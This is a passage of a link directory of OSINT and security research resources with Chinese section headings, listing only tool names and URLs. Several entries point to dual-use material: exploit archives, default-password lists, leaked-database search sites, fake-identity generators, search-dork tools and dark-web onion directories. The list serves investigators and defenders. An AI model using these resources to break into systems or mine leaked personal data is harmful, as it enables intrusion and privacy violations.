&#x20;<https://github.com/mrcoles/full-page-screen-capture-chrome-extension> ​ Full Page Screen Capture Chrome Extension (T) ​ <https://github.com/dxa4481/Snapper> ​ Snapper (T) ​ <https://www.magnetforensics.com/free-tool-web-page-saver/> ​ Web Page Saver ​ <http://archive.is/> ​ Archive.is ​ <http://www.page2images.com/URL-Live-Website-Screenshot-Generator> ​ Page2Images (T) ​ <https://portswigger.net/burp/download.html> ​ Burp Suite (T) ​ <https://www.telerik.com/download/fiddler> ​ Fiddler (T) ​ <http://www.hunch.ly/> ​ Hunchly (T)

#### 身份保护

**元数据 / 样式**

&#x20;<https://github.com/psal/anonymouth> ​ Anonymouth - Document Anonymization (T)

**隐私 / 清理**

&#x20;<https://themanyhats.club/centralised-place-for-privacy-resources/> ​ The Many Hats Club - Privacy Resources ​ <https://inteltechniques.com/data/workbook.pdf> ​ Intel Techniques - Hiding from the Internet ​ <https://panopticlick.eff.org/> ​ Panopticlick ​ <https://www.privacytools.io/> ​ 隐私 / 清理 ​ <https://robinlinus.github.io/socialmedia-leak/> ​ Social Media Fingerprint ​ <http://xdd2.org/> ​ Fake US Identities ​ <https://inteltechniques.com/blog/2018/09/28/complete-credit-freeze-tutorial-update/> ​ Credit Freeze ​ <https://www.optoutprescreen.com/?rf=t> ​ OptOut Credit Prescreen ​ <https://www.safeshepherd.com/handbook> ​ The Internet Privacy Handbook ​ <https://www.accountkiller.com/en> ​ Accountkiller.com ​ <http://backgroundchecks.org/justdeleteme/> ​ Just Delete Me

**匿名浏览**

&#x20;<http://www.locabrowser.com> ​ LocaBrowser.com ​ <http://browserspy.dk/> ​ BrowserSpy.dk ​ <https://addons.mozilla.org/en-US/firefox/addon/self-destructing-cookies/> ​ Self-Destructing Cookies (T) ​ <https://browserleaks.com/> ​ Browser Leaks ​ <https://github.com/amq/firefox-debloat> ​ Firefox-debloat ​ <https://noscript.net/> ​ NoScript (T) ​ Proxy Tests ​ <https://www.ip2proxy.com/> ​ IP2Proxy ​ <https://proxycheck.haschek.at/> ​ Proxychecker ​ Browser Tests ​ <http://www.browserscope.org/> ​ Browserscope ​ <http://browserspy.dk/browser.php> ​ BrowserSpy.dk Browser Information ​ <https://whatbrowser.org/> ​ What Browser? ​ <http://www.whatbrowseramiusing.co/> ​ What browser am I using.co ​ <http://www.whatsmybrowser.org/> ​ WhatsMyBrowser.org ​ <https://www.w3schools.com/browsers/default.asp> ​ Browser Statistics ​ VPN Tests ​ <http://www.tracemyip.org/> ​ Trace My IP ​ <http://letmecheck.it/> ​ LetMeCheck.it ​ <https://www.perfect-privacy.com/webrtc-leaktest/> ​ WebRTC Leak Test ​ <https://www.perfect-privacy.com/check-ip/> ​ Perfect Privacy ​ <http://emailipleak.com/> ​ Email Leak Tests ​ <http://ipv6leak.com/> ​ IPv6 Leak Tests ​ <https://torguard.net/vpn-dns-leak-test.php> ​ TorGuard ​ <http://dnsleak.com/> ​ DNS Leak Tests ​ <https://www.dnsleaktest.com/> ​ DNS leak test ​ <http://ip-check.info/?lang=en> ​ JonDonym ​ <https://ipleak.net/> ​ IP / DNS Leak Detection ​ Spoof User-Agent ​ <http://tools.tracemyip.org/user-agent-string-decoder/> ​ User Agent String Decoder ​ <https://www.whatismybrowser.com/> ​ WhatIsMyBrowser.com ​ <http://www.useragentstring.com/pages/useragentstring.php> ​ UserAgentString.com ​ Anonymous VPNs ​ <https://thatoneprivacysite.net/> ​ VPN Comparisons - That One Privacy Site ​ <https://www.deepdotweb.com/vpn-comparison-chart/> ​ DeepDotWeb VPN Comparison Chart ​ TOR ​ <https://geti2p.net/en/> ​ I2P Anonymous Network (T) ​ <https://www.torproject.org/download/download-easy.html.en> ​ Tor Download (T)

**虚拟身份创建**

&#x20;<https://cdn.rawgit.com/Marak/faker.js/master/examples/browser/index.html> ​ Faker.js ​ <https://www.pexels.com/> ​ Pexels ​ <https://randomuser.me/> ​ Random User Generator ​ <http://justdelete.me/fake-identity-generator/> ​ Fake Identity Generator ​ <http://www.fakenamegenerator.com/> ​ Fake Name Generator

#### 威胁情报

**<https://iocfeed.mrlooquer.com>**

**Mr.Looquer IOC Feed - 1st Dual Stack Threat Feed**

**<https://pulsedive.com>**

**Pulsedive**

**<https://riskdiscovery.com/honeydb/>**

**HoneyDB**

**<https://github.com/aptnotes/data>**

**APTnotes**

**<https://community.blueliv.com/> !/discover**

**Blueliv Threat Exchange (R)**

**<http://botscout.com/>**

**Bot Scout**

**<https://github.com/csirtgadgets/massive-octo-spice>**

**massive-octo-spice - csirtgadgets Github**

**<https://github.com/keithjjones/hostintel>**

**hostintel - keithjjones Github**

**<https://github.com/mlsecproject/combine>**

**mlsecproject / combine**

**<https://cymon.io/>**

**Cymon Open Threat Intelligence**

**<http://www.projecthoneypot.org/>**

**Project Honey Pot**

**<https://www.malwarepatrol.net/open-source.shtml>**

**Malware Patrol**

**<http://www.misp-project.org/>**

**Malware Information Sharing Platform**

**<https://exchange.xforce.ibmcloud.com/new>**

**IBM X-Force Exchange**

**TTPs**

&#x20;<https://attack.mitre.org/wiki/All_Techniques> ​ Mitre TTPs ​ <https://www.pwnmalw.re/> ​ Malware Exploit TTP Database

**IOC Tools**

&#x20;<https://github.com/InQuest/ThreatIngestor> ​ ThreatIngestor (T) ​ <https://github.com/InQuest/python-iocextract> ​ iocextract (T) ​ <https://github.com/NullArray/Mimir> ​ Mimir ​ <https://github.com/cloudtracer/ThreatPinchLookup> ​ ThreatPinch Lookup ​ <https://github.com/sroberts/cacador> ​ Cacador ​ <https://github.com/armbues/ioc_parser> ​ IOC Parser ​ <https://github.com/sroberts/jager> ​ Jager

**钓鱼**

&#x20;<https://phishstats.info/> ​ PhishStats ​ <https://www.phishtank.com/> ​ PhishTank ​ <https://openphish.com/feed.txt> ​ <https://openphish.com/feed.txt>

#### 漏洞利用 & 漏洞预警

**<https://cyber.gc.ca/>**

**Canadian Centre for Cyber Security**

**<https://secuniaresearch.flexerasoftware.com/community/research/>**

**Secunia**

**<http://0day.today/>**

**0day.today**

**<https://www.owasp.org/index.php/Main\\_Page>**

**OWASP**

**<http://cve.mitre.org/>**

**CVE - MITRE**

**<http://www.cvedetails.com/>**

**CVE Details**

**<http://osvdb.org/>**

**OSVDB: Open Sourced Vulnerability Database**

**<https://nvd.nist.gov/>**

**NVD - NIST**

**<http://www.securityfocus.com/bid>**

**SecurityFocus**

**<https://packetstormsecurity.com/>**

**Packet Storm**

**<https://www.exploit-db.com/>**

**Exploit DB**

**<https://attack.mitre.org/>**

**MITRE ATT\&CK**

**默认密码**

&#x20;<https://hashes.org/> ​ Hashes.org ​ <http://open-sez.me/> ​ Open Sez Me Default Passwords ​ <http://routerpasswords.com/> ​ Default Router Passwords ​ <http://phenoelit.org/dpl/dpl.html> ​ Phenoelit Default Password List ​ <http://www.fortypoundhead.com/tools_dpw.asp> ​ Default Password Lookup Utility ​ <https://default-password.info/> ​ Default passwords list ​ <https://cirt.net/passwords> ​ Default Passwords DB

#### 恶意文件分析

**<http://malwareanalysis.tools/>**

**Malware Analysis Tools**

**<https://github.com/NationalSecurityAgency/ghidra>**

**Ghidra (T)**

**PCAPs**

&#x20;<http://www.malware-traffic-analysis.net/index.html> ​ Malware-Traffic-Analysis.net

**PDFs**

&#x20;<https://code.google.com/archive/p/origami-pdf/> ​ Origami Framework (T) ​ <http://blog.didierstevens.com/programs/pdf-tools/> ​ PDF Tools (T)

**Office Files**

&#x20;<http://go.microsoft.com/fwlink/?LinkID=158791> ​ OffVis (T) ​ <http://www.reconstructer.org/> ​ Office Mal Scanner (T)

**自动分析**

&#x20;<https://app.any.run/> ​ Any Run ​ <https://sandbox.anlyz.io> ​ Anlyz.io ​ <https://koodous.com> ​ Koodous ​ <http://www.threatexpert.com/submit.aspx> ​ ThreatExpert Sandbox ​ <http://sandbox.pikker.ee/> ​ Pikker.ee Cuckoo Sandbox ​ <https://www.file-analyzer.net/> ​ Joe File Analyzer ​ <https://detux.org/> ​ detux Linux Sandbox ​ <https://sandbox.deepviz.com/> ​ Deepviz Sandbox ​ <https://consumer.valkyrie.comodo.com/> ​ Valkyrie File Analysis ​ <https://community.blueliv.com/> !/sandbox ​ Blueliv Sandbox ​ <http://eureka.cyber-ta.org/> ​ Eureka ​ <http://ether.gtisc.gatech.edu/web_unpack> ​ Ether ​ <https://www.malwareviz.com/> ​ MalwareViz ​ <https://www.hybrid-analysis.com/> ​ Hybrid Analysis ​ <https://malwr.com/> ​ Malwr ​ <https://www.virustotal.com/> ​ VirusTotal ​ Android ​ <https://www.apk-analyzer.net/> ​ Joe APK Analyzer ​ <http://akana.mobiseclab.org/> ​ Akana Android Malware ​ PDFs ​ <https://www.vicheck.ca/> ​ ViCheck ​ <https://wepawet.iseclab.org/> ​ Wepawet ​ Office Files ​ <http://www.document-analyzer.net/> ​ JoeSandbox Document Analyzer ​ <http://scan.xecure-lab.com/> ​ XecScan

**搜索**

&#x20;<http://nsrl.hashsets.com/national_software_reference_library1_search.php> ​ National Software Reference Library ​ <https://id-ransomware.malwarehunterteam.com/> ​ ID Ransomware ​ <http://vxvault.net/ViriList.php> ​ VX Vault ​ <https://totalhash.cymru.com/> ​ totalhash ​ <https://virusshare.com/> ​ VirusShare.com ​ <http://decalage.info/en/mwsearch> ​ Decalage Malware Search

#### 工具

**<https://www.overviewdocs.com/>**

**Overview**

**<https://www.epicbrowser.com/>**

**Epic Privacy Browser (T)**

**<http://www.paterva.com/web6/products/maltego.php>**

**Paterva / Maltego (T)**

**虚拟机**

&#x20;<https://www.whonix.org/wiki/Main_Page> ​ Whonix (T) ​ <https://tails.boum.org/> ​ Tails Live OS (T) ​ <https://subgraph.com/index.en.html> ​ Subgraph OS (T) ​ <https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/> ​ Microsoft Edge Development OS VMs (T) ​ <https://www.parrotsec.org/> ​ ParrotSec OS (T) ​ <https://www.kali.org/> ​ Kali Linux OS (T) ​ <https://inteltechniques.com/buscador/index.html> ​ Buscador OS (T) ​ <https://www.virtualbox.org/> ​ VirtualBox (T) ​ <http://www.vmware.com/products/player/playerpro-evaluation.html> ​ VMware Workstation Player (T)

**渗透测试侦察**

&#x20;<https://github.com/blindfuzzy/LHF> ​ Low Hanging Fruit (T)

**OSINT自动化**

&#x20;<https://github.com/sundowndev/PhoneInfoga> ​ PhoneInfoga (T) ​ <https://flow.microsoft.com/en-us/> ​ Microsoft Flow ​ <https://github.com/SharadKumar97/OSINT-SPY> ​ OSINT-SPY (T) ​ <https://github.com/NullArray/IntRec-Pack> ​ IntRec-Pack (T) ​ <https://github.com/bharshbarger/AutOSINT> ​ AutoOSINT (T) ​ <https://github.com/penafieljlm/inquisitor> ​ Inquisitor (T) ​ <https://github.com/i3visio/osrframework> ​ OSRFramework (T) ​ <https://intrigue.io/> ​ Intrigue.io (T) ​ <https://www.stringify.com/> ​ Stringify ​ <https://ifttt.com/> ​ IFTTT ​ <https://github.com/s0md3v/ReconDog> ​ ReconDog (T) ​ <https://github.com/s0md3v/Photon> ​ Photon (T) ​ <https://github.com/InQuest/omnibus> ​ Omnibus (T) ​ <http://www.spiderfoot.net/> ​ SpiderFoot (T) ​ <https://github.com/datasploit/datasploit/> ​ DataSploit (T)

#### 编码 / 解码

**<https://www.functions-online.com/>**

**Functions Online**

**<https://gchq.github.io/CyberChef/>**

**CyberChef**

**XOR**

&#x20;Python ​ <https://bitbucket.org/decalage/balbuzard> ​ Balbuzard (T) ​ <https://github.com/hiddenillusion/NoMoreXOR> ​ NoMoreXOR.py (T) ​ <http://eternal-todo.com/var/scripts/xorbruteforcer> ​ XORBruteForcer.py (T) ​ <http://hooked-on-mnemonics.blogspot.com/p/iheartxor.html> ​ iheartxor.py (T) ​ Windows ​ <http://www.kahusecurity.com/tools/> ​ Kahu Converter Utilities (T) ​ Unix ​ <https://github.com/tomchop/unxor> ​ unxor (T) ​ <https://github.com/hellman/xortool> ​ xortool (T) ​ <http://blog.didierstevens.com/programs/xorsearch/> ​ XORSearch & XORStrings (T)

**PHP**

&#x20;<http://ddecode.com/phpdecoder/> ​ DDecode - PHP Decoder

**Javascript**

&#x20;<https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/> ​ JavaScript Deobfuscator (T) ​ <http://www.kahusecurity.com/tools/> ​ Kahu Revelo (T) ​ <https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey> ​ SpiderMonkey (T) ​ <https://getfirebug.com/downloads/> ​ Firebug (T) ​ <http://jsnice.org/> ​ JS NICE ​ <http://jsbeautifier.org/> ​ JS Beautifier

**Barcodes / QR**

&#x20;<http://online-barcode-reader.inliteresearch.com/> ​ ClearImage Barcode Reader

**Base64**

&#x20;]

#### 分类信息

**<http://claz.org/>**

**Claz.org**

**<http://www.oodle.com/>**

**Oodle**

**<http://www.searchtempest.com/>**

**Search Tempest**

**<http://www.backpage.com/>**

**Backpage**

**<http://www.totalcraigsearch.com/>**

**TotalCraigSearch**

**<http://www.searchalljunk.com/>**

**SearchAllJunk**

**<http://www.flippity.com/>**

**Flippity**

**<http://www.goofbid.com/>**

**Goofbid**

**<https://offerup.com/>**

**OfferUp**

**<http://www.ebay.com/>**

**eBay**

**<http://www.quikr.com/>**

**Quikr - India Classifieds**

**<http://www.kijiji.ca/>**

**Kijiji - Canada Classifieds**

**<http://craigslist.org/>**

**Craigslist**

#### 数字货币

**Monero**

&#x20;<https://chainradar.com/xmr/blocks> ​ Chain Radar ​ <http://moneroblocks.info/> ​ Monero Blocks ​ <https://xmrchain.net/> ​ XMRChain.net

**Ethereum**

&#x20;<https://etherscan.io/> ​ Etherscan ​ <https://etherchain.org/accounts/> ​ etherchain.org ​ <https://live.ether.camp/transactions> ​ Ether.Camp

**Bitcoin**

&#x20;<https://github.com/s0md3v/Orbit> ​ Orbit (T) ​ <http://bitcoinwhoswho.com/> ​ Bitcoin Who's Who ​ <https://www.blockonomics.co/> ​ Blockonomics ​ <https://graphsense.info/> ​ Graphsense ​ <https://www.walletexplorer.com/> ​ Wallet Explorer ​ <https://bitref.com/> ​ BitRef ​ <http://blockr.io/> ​ Blockr.io ​ <https://blockexplorer.com/> ​ Block Explorer ​ <https://blockchain.info/> ​ Blockchain.info ​ <https://www.blocktrail.com/BTC> ​ Blocktrail

#### 暗网

**<https://iaca-darkweb-tools.com/>**

**IACA Dark Web Investigation Support**

**<https://tor2web.org/>**

**Tor2web**

**TOR目录**

&#x20;<http://eqt5g4fuenphqinx.onion/> ​ Core.onion ​ <http://thehiddenwiki.org/> ​ Hidden Wiki

**TOR搜索**

&#x20;<https://ahmia.fi/> ​ Ahmia ​ <http://darkfailllnkf4vf.onion/> ​ dark.fail ​ <http://tor66sezptuu2nta.onion/> ​ Tor66 ​ <http://hss3uro2hsxfogfq.onion/> ​ Not Evil ​ <http://gjobqjj7wyczbqie.onion/> ​ Candle ​ <http://www.onion.link/> ​ OnionLink ​ <https://onion.cab/> ​ Onion Cab

**发现**

&#x20;<https://oint.ctrlbox.com/> ​ Onion Investigator ​ <https://github.com/milesrichardson/docker-onion-nmap> ​ docker-onion-nmap (T) ​ <https://darkweb.hunch.ly/> ​ Hunchly Hidden Services Report ​ <https://github.com/k4m4/onioff> ​ Onioff ​ <http://www.torscan.io/> ​ Tor Scan ​ <https://github.com/DedSecInside/TorBot> ​ TorBot ​ <https://github.com/s-rah/onionscan> ​ OnionScan

**客户端**

&#x20;<https://geti2p.net/en/> ​ I2P Anonymous Network (T) ​ <https://www.torproject.org/download/download-easy.html.en> ​ Tor Download (T)

**一般信息**

&#x20;<https://www.reddit.com/r/darknet> ​ Reddit Darknet ​ <https://www.reddit.com/r/onions> ​ Reddit Onions ​ <https://www.reddit.com/r/deepweb> ​ Reddit Deep Web

#### 恐怖主义

**<http://www.start.umd.edu/gtd/>**

**Global Terrorism Database**

#### 手机模拟器

**Android**

&#x20;Apps ​ <https://play.google.com/store/apps/details?id=com.truecaller> ​ Truecaller (T) ​ 流式视频 ​ <https://play.google.com/store/apps/details?id=co.vine.android> ​ Vine (T) ​ <https://play.google.com/store/apps/details?id=co.getair.meerkat> ​ Meerkat (T) ​ <https://play.google.com/store/apps/details?id=tv.periscope.android> ​ Periscope (T) ​ 图片 ​ <https://play.google.com/store/apps/details?id=com.yahoo.mobile.client.android.flickr> ​ Flickr (T) ​ <https://play.google.com/store/apps/details?id=com.instagram.android> ​ Instagram (T) ​ 即时消息 ​ <https://play.google.com/store/apps/details?id=jp.naver.line.android> ​ LINE (T) ​ <https://play.google.com/store/apps/details?id=com.yik.yak> ​ Yik Yak (T) ​ <https://play.google.com/store/apps/details?id=kik.android> ​ Kik (T) ​ <https://play.google.com/store/apps/details?id=com.whatsapp> ​ WhatsApp Messenger (T) ​ <https://play.google.com/store/apps/details?id=com.snapchat.android> ​ Snapchat (T) ​ <https://play.google.com/store/apps/details?id=org.telegram.messenger> ​ Telegram (T) ​ <https://play.google.com/store/apps/details?id=im.vector.app> ​ Riot.im - Communicate your way (T) ​ <https://play.google.com/store/apps/details?id=org.thoughtcrime.securesms> ​ Signal Private Messenger (T) ​ 社交网络 ​ <https://play.google.com/store/apps/details?id=com.pinterest> ​ Pinterest (T) ​ <https://play.google.com/store/apps/details?id=com.twitter.android> ​ Twitter (T) ​ <https://play.google.com/store/apps/details?id=com.linkedin.android> ​ LinkedIn (T) ​ <https://play.google.com/store/apps/details?id=com.facebook.katana> ​ Facebook (T) ​ 仿真工具 ​ <https://www.bignox.com/> ​ Nox App Player ​ <http://www.andyroid.net/> ​ Andy Android Emulator (T) ​ <http://www.bluestacks.com/> ​ BlueStacks 2 (T) ​ <https://www.genymotion.com/> ​ Genymotion (T)

#### 元数据

**<http://www.codetwo.com/freeware/outlook-export/>**

**CodeTwo Outlook Export (T)**

**<https://www.elevenpaths.com/labstools/foca/index.html>**

**FOCA (T)**

**<http://www.edge-security.com/metagoofil.php>**

**Metagoofil (T)**

**<http://www.sno.phy.queensu.ca/\\~phil/exiftool/>**

**ExifTool (T)**

#### 翻译

**分析**

&#x20;<https://applymagicsauce.com/demo.html> ​ Apply Magic Sauce ​ <https://www.myfonts.com/WhatTheFont/> ​ WhatTheFont ​ <https://tone-analyzer-demo.mybluemix.net/> ​ Tone Analyzer ​ <https://personality-insights-livedemo.mybluemix.net/> ​ Personality Insights

**图片**

&#x20;<http://www.onlineocr.net/> ​ Online OCR ​ <https://www.newocr.com/> ​ New OCR ​ <http://www.i2ocr.com/> ​ i2OCR ​ <http://www.free-ocr.com/> ​ Online OCR

**Text**

&#x20;<http://www.urbandictionary.com/> ​ Urban Dictionary ​ <http://www.noslang.com/> ​ Slang Dictionary & Translator ​ <https://slangit.com/> ​ Slangit - The Slang Dictionary ​ <https://www.wiktionary.org/> ​ Wiktionary ​ <http://www.worldlingo.com/en/products_services/worldlingo_translator.html> ​ Free Online Translation ​ <https://www.freetranslation.com/> ​ Free Translation ​ <http://translate.reference.com/> ​ Dictionary.com Translator ​ <http://www.bing.com/translator/> ​ Bing Translate ​ <https://www.google.com/inputtools/try/> ​ Google Input Tools ​ <https://translate.google.com/> ​ Google Translate ​ <https://www.deepl.com/> ​ DeepL Translator

#### 档案

**其他媒体**

&#x20;<https://archive.org/details/tv> ​ TV Closed Caption Search ​ <http://chroniclingamerica.loc.gov/search/titles/> ​ Library of Congress: Newspaper Directory - 1690-Present ​ <http://chroniclingamerica.loc.gov/> ​ Library of Congress: Digitized Newspapers - 1836-1922

**公共数据**

&#x20;<http://snap.stanford.edu/data/> amazon ​ Stanford Large Network Dataset Collection ​ <https://archive.ics.uci.edu/ml/datasets/Spambase> ​ UCI Spambase Data Set ​ <http://visualgenome.org/> ​ VisualGenome ​ <http://lsun.cs.princeton.edu/2016/> ​ Large-scale Scene Understanding Challenge ​ <http://vis-www.cs.umass.edu/lfw/> ​ Labled Faces in the Wild DB

**数据泄露**

&#x20;<https://wikileaks.org/> ​ WikiLeaks ​ <http://cryptome.org/> ​ Cryptome ​ <https://search.weleakinfo.com/> ​ Weleakinfo ​ <https://databases.today/> ​ Databases.Today

**Web**

&#x20;<https://github.com/jsvine/waybackpack> ​ Waybackpack (T) ​ <http://browsershots.org/> ​ Browsershots ​ <http://www.bounceapp.com/> ​ Bounce ​ <http://pdfmyurl.com/> ​ PDF My URL ​ <https://chrome.google.com/webstore/detail/wayback-machine/fpnmgdkabkmnadcjpehmlllkndpkmiak> ​ Wayback Machine Chrome Extension ​ <http://commoncrawl.org/> ​ Common Crawl ​ <https://web-beta.archive.org/> / ​ Wayback Machine - Beta Search ​ <http://www.screenshots.com/> ​ Screenshots.com ​ <http://www.webarchive.org.uk/ukwa/> ​ UK Web Archive ​ <http://textfiles.com/> ​ Textfiles.com ​ <http://www.cachedpages.com/> ​ Cached Pages ​ <http://cachedview.com/> ​ Cached View ​ <http://webcitation.org/query> ​ WebCite ​ <https://archive.is/> ​ Archive.is ​ <https://archive.org/web/> ​ Internet Archive: Wayback Machine

#### 论坛 / 博客 / IRC

**IRC搜索**

&#x20;<https://botbot.me/> ​ BotBot.me ​ <http://irc.netsplit.de/channels/search.php> ​ netsplit.de ​ <https://github.com/bwall/ircsnapshot> ​ ircsnapshot (T) ​ <http://search.mibbit.com/> ​ Mibbit

**博客搜索引擎**

&#x20;<http://www.notey.com/> ​ Notey ​ <http://www.blogsearchengine.org/> ​ Blog Search Engine ​ <https://www.twingly.com/search> ​ Twingly Blog Search ​ <http://www.topix.com/search/article?q=> ​ Topix ​ <http://ljseek.com/> ​ Live Journal Seek ​ <http://www.icerocket.com/advancedsearch?tab=blog&q=&n=&e=&a=&domain=&query=> ​ IceRocket

**论坛搜索引擎**

&#x20;<https://groups.yahoo.com/neo/search>? ​ Yahoo Groups ​ <https://groups.google.com/forum/> !overview ​ Google Groups Search ​ <http://www.delphiforums.com/> ​ Delphi Forum Search ​ <https://forums.craigslist.org/> ​ Craigslist Forums ​ <http://omgili.com/> ​ Omgili ​ <http://boardreader.com/> ​ BoardReader

#### 搜索引擎

**事实核查**

&#x20;<http://mediabugs.org/> ​ MediaBugs ​ <http://verificationjunkie.com/> ​ Verification Junkie ​ <http://verificationhandbook.com/> ​ Verification Handbook ​ <http://www.snopes.com/> ​ Snopes ​ <http://www.stopfake.org/en/category/tools/> ​ Stop Fake Tools ​ <http://reporterslab.org/fact-checking/> ​ Duke Reporters' Lab ​ <http://www.factcheck.org/scicheck/> ​ SciCheck ​ <http://www.politifact.com/> ​ PolitiFact ​ <https://africacheck.org/> ​ Africa Check ​ <https://hoaxy.iuni.iu.edu/> ​ Hoaxy

**搜索引擎指南**

&#x20;<http://googleguide.com/help/calculator.html> ​ Google Guide Cheat Sheet ​ <http://googleguide.com/advanced_operators_reference.html> ​ Google Search Operators Guide ​ <https://www.exploit-db.com/google-hacking-database/> ​ Google Hacking Database

**搜索工具**

&#x20;<https://www.google.com/trends/correlate/> ​ Google Correlate ​ <http://www.talkwalker.com/alerts> ​ Talkwalker Alerts ​ <https://github.com/opsdisk/pagodo> ​ pagodo - Passive Google Dork (T) ​ <https://cse.google.com/cse/> ​ Google Custom Search Engine ​ <https://www.google.com/alerts> ​ Google Alerts ​ <https://github.com/googleinurl/SCANNER-INURLBR> ​ Scanner-inurlbr (T) ​ <http://www.bishopfox.com/download/405/> ​ SearchDiggity (T) ​ <https://millionshort.com/> ​ Million Short

**其他**

&#x20;<http://www.findthedata.com/> ​ FindTheData A Research Engine ​ <http://entitycube.research.microsoft.com/> ​ EntityCube ​ <http://search-id.com/> ​ AOL Search Database ​ <http://ese.rfe.org/> ​ Economics Search Engine ​ <http://www.similarsites.com/browse> ​ SimilarSites ​ <http://www.searchenginecolossus.com/> ​ Colossus International Engine List ​ <https://www.yobi3d.com/> !/ ​ Yobi3D - 3D Model Search

**新闻**

&#x20;<https://getnewsbot.com/> ​ NewsBot ​ <https://www.inshorts.com/en/read> ​ Inshorts ​ <http://hubii.com/> ​ Hubii ​ <http://www.newsnow.co.uk/h/> ​ NewsNow\.co.uk ​ <https://wn.com/> /search ​ World News ​ <http://www.allyoucanread.com/> ​ AllYouCanRead.com ​ <http://emm.newsbrief.eu/NewsBrief/clusteredition/en/latest.html> ​ NewsBrief ​ <http://newspapermap.com/> ​ Newspaper Map ​ <http://www.pressreader.com/> ​ PressReader.com ​ <http://newspaperarchive.com/> ​ NewspaperARCHIVE.com ​ <http://www.yougotthenews.com/> ​ YouGotTheNews ​ <https://flipboard.com/> ​ Flipboard ​ <https://news.google.com/news/advanced_news_search>? ​ Google News Search ​ <http://www.thepaperboy.com/> ​ Paperboy Online Newspapers

**学术 / 出版物**

&#x20;<https://arxiv.org/> ​ arXiv.org ​ <http://www.thescipub.com/> ​ Science Publications ​ <http://explorer.opensyllabusproject.org/> ​ The Open Syllabus Project ​ <http://www.pagepress.org/> ​ Open Access Scholarly Journals ​ <http://www.lazyscholar.org/> ​ Lazy Scholar (T) ​ <http://copyscape.com/> ​ Copyscape Plagiarism Checker ​ <http://guides.uflib.ufl.edu/az.php> ​ Library Databases ​ <http://guides.library.harvard.edu/hks/think_tank_search> ​ Think Tank Search ​ <http://pqdtopen.proquest.com/search.html> ​ PQDT Open ​ <http://www.sciencedirect.com/> ​ Science Direct ​ <https://academic.microsoft.com/> ​ Microsoft Academic ​ <http://www.opendoar.org/search.php> ​ OpenDOAR ​ <https://www.gpo.gov/fdsys/> ​ US Gov Publishing Office - FDsys ​ <http://opengrey.eu/> ​ OpenGrey EU Papers ​ <http://discovery.nationalarchives.gov.uk/> ​ UK National Archives ​ <https://www.hathitrust.org/> ​ HathiTrust Digital Library ​ <http://jurn.org/> gsc.tab=0 ​ JURN ​ <https://www.wdl.org/en/> ​ World Digital Library ​ <https://openlibrary.org/> ​ Open Library ​ <http://ssrn.com/en/> ​ Social Science Research Network ​ <http://www.ncbi.nlm.nih.gov/pubmed/> ​ PubMed - National Center for Biotechnology Information ​ <https://scholar.google.com/> ​ Google Scholar ​ <https://www.base-search.net/Search/Advanced> ​ Bielefeld Academic Search Engine ​ <https://pubpeer.com/> ​ PubPeer

**FTP**

&#x20;<http://filemare.com/en-us> ​ FileMare ​ <http://www.searchftps.net/> ​ Napalm FTP ​ <https://www.google.com/search?q=inurl%3Aftp+-inurl%3Ahttp+-inurl%3Ahttps+ftpsearchterm> ​ FTP Google Dork (D) ​ <https://globalfilesearch.com/> ​ GlobalFile

**代码**

&#x20;<https://gitleaks.com/> ​ GitLeaks ​ <https://github.com/techgaun/github-dorks> ​ Github-Dorks (T) ​ <https://github.com/michenriksen/gitrob> ​ Gitrob (T) ​ <https://nerdydata.com/search> ​ NerdyData ​ <https://searchcode.com/> ​ Searchcode ​ <https://publicwww.com/> ​ PublicWWW

**元数据**

&#x20;<http://answerthepublic.com/> ​ AnswerThePublic.com ​ <http://www.dmoz.org/> ​ DMOZ ​ <http://www.whostalkin.com/> ​ WhosTalkin ​ <http://addictomatic.com/> ​ Addictomatic ​ <https://searx.me/> ​ searx.me ​ <https://www.etools.ch/> ​ eTools.ch ​ <http://yippy.com/> ​ Yippy ​ <http://search.carrot2.org/stable/search> ​ Carrot2 ​ <http://biznar.com/biznar/desktop/en/search.html> ​ Biznar ​ <http://iseek.com/iseek/home.page> ​ iSEEK

**一般搜索引擎**

&#x20;<https://hulbee.com/> ​ Hulbee ​ <http://www.instya.com/> /web/ ​ Instya ​ <http://advangle.com/> ​ Advangle ​ <https://www.ixquick.com/> ​ Ixquick Search Engine ​ <http://bvsg.org/> ​ Bing vs. Google ​ <http://www.izito.com/> ​ iZito ​ <http://www.iboogie.com/> ​ iBoogie ​ <https://www.google.com/advanced_search> ​ Google Advanced Search ​ <http://www.baidu.com/> ​ Baidu ​ <https://www.yandex.com/> ​ Yandex ​ <https://www.startpage.com/> ​ StartPage ​ <https://search.yahoo.com/web/advanced> ​ Yahoo Advanced Web Search ​ <https://duckduckgo.com/> ​ DuckDuckGo ​ <http://www.bing.com/> ​ Bing ​ <https://www.google.com/?gws_rd=ssl> ​ Google

#### 定位工具 / 地图

**<https://livingatlas.arcgis.com/wayback/>**

**Wayback Imagery**

**<http://www.usnaviguide.com/>**

**US Nav Guide Zip Code Data**

**<http://hikebikemap.org/>**

**Hiking & Biking Map**

**<http://www.yournavigation.org/>**

**OpenStreetMap Routing Service**

**<http://www.openrailwaymap.org/>**

**OpenRailwayMap**

**<https://www.mapquest.com/>**

**MapQuest**

**<https://www.ncdc.noaa.gov/nexradinv/>**

**NEXRAD Data Inventory Search**

**<https://landsatlook.usgs.gov/sentinel2/>**

**Sentinel2Look Viewer**

**<https://landsatlook.usgs.gov/>**

**LandsatLook Viewer**

**<https://hivemapper.com/>**

**Hivemapper**

**<http://travelbydrone.com/>**

**Travel by Drone**

**<http://www.dronetheworld.com/>**

**Dronetheworld**

**<http://openstreetcam.org/>**

**OpenStreetCam**

**<https://earthexplorer.usgs.gov/>**

**EarthExplorer**

**<http://www.openstreetmap.org/> map=5/51.500/-0.100**

**OpenStreetMap**

**<http://map.naver.com/>**

**Naver (Korean)**

**<http://map.daum.net/>**

**Daum (Korean)**

**<http://corona.cast.uark.edu/>**

**Corona**

**<http://map.baidu.com/>**

**Baidu Maps**

**<https://www.google.com/earth/>**

**Google Earth**

**<https://www.terraserver.com/view>**

**TerraServer**

**<https://yandex.com/maps/>**

**Yandex.Maps**

**<http://www.mgmaps.com/kml/> view**

**Google Earth Overlays**

**<https://followyourworld.appspot.com/>**

**Google Maps Update Alerts**

**<http://www.historicaerials.com/?javascript=&>**

**Historic Aerials**

**<http://www.flashearth.com/>**

**Flash Earth**

**<http://www.openstreetmap.org/> map=5/40.614/-100.679**

**OpenStreetMap**

